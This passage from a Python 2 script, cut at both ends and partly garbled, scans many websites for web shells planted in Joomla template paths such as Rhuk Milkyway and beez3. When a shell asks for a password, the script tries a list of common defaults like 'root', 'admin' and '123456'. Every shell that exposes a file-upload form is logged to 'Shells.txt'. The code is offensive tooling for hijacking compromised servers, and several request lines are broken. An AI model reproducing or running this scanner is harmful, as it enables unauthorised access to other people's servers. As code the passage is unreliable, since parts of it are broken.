else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH10_J_content = requests.get(SH10_J,timeout=15).content
if ' type="file"' in SH10_J_content or ' type=\'file\'' in SH10_J_content or ' type= "file"' in SH10_J_content or ' type= \'file\'' in SH10_J_content or ' type = "file"' in SH10_J_content or ' type = \'file\'' in SH10_J_content or ' type ="file"' in SH10_J_content or ' type =\'file\'' in SH10_J_content or ' type=file' in SH10_J_content or ' type =file' in SH10_J_content or ' type= file' in SH10_J_content or ' type = file' in SH10_J_content or 'Upload</a> ]</li><li>[' in SH10_J_content or 'upload</a><li><a>Sym' in SH10_J_content :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH10_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH11_J_content = requests.get(SH11_J,timeout=15).content
if ' type="file"' in SH11_J_content or ' type=\'file\'' in SH11_J_content or ' type= "file"' in SH11_J_content or ' type= \'file\'' in SH11_J_content or ' type = "file"' in SH11_J_content or ' type = \'file\'' in SH11_J_content or ' type ="file"' in SH11_J_content or ' type =\'file\'' in SH11_J_content or ' type=file' in SH11_J_content or ' type =file' in SH11_J_content or ' type= file' in SH11_J_content or ' type = file' in SH11_J_content or 'Upload</a> ]</li><li>[' in SH11_J_content or 'upload</a><li><a>Sym' in SH11_J_content :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH11_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH12_J_content = requests.get(SH12_J,timeout=15).content
if ' type="file"' in SH12_J_content or ' type=\'file\'' in SH12_J_content or ' type= "file"' in SH12_J_content or ' type= \'file\'' in SH12_J_content or ' type = "file"' in SH12_J_content or ' type = \'file\'' in SH12_J_content or ' type ="file"' in SH12_J_content or ' type =\'file\'' in SH12_J_content or ' type=file' in SH12_J_content or ' type =file' in SH12_J_content or ' type= file' in SH12_J_content or ' type = file' in SH12_J_content or 'Upload</a> ]</li><li>[' in SH12_J_content or 'upload</a><li><a>Sym' in SH12_J_content :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH12_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH13_J_content = requests.get(SH13_J,timeout=15).content
if ' type="file"' in SH13_J_content or ' type=\'file\'' in SH13_J_content or ' type= "file"' in SH13_J_content or ' type= \'file\'' in SH13_J_content or ' type = "file"' in SH13_J_content or ' type = \'file\'' in SH13_J_content or ' type ="file"' in SH13_J_content or ' type =\'file\'' in SH13_J_content or ' type=file' in SH13_J_content or ' type =file' in SH13_J_content or ' type= file' in SH13_J_content or ' type = file' in SH13_J_content or 'Upload</a> ]</li><li>[' in SH13_J_content or 'upload</a><li><a>Sym' in SH13_J_content :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH13_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
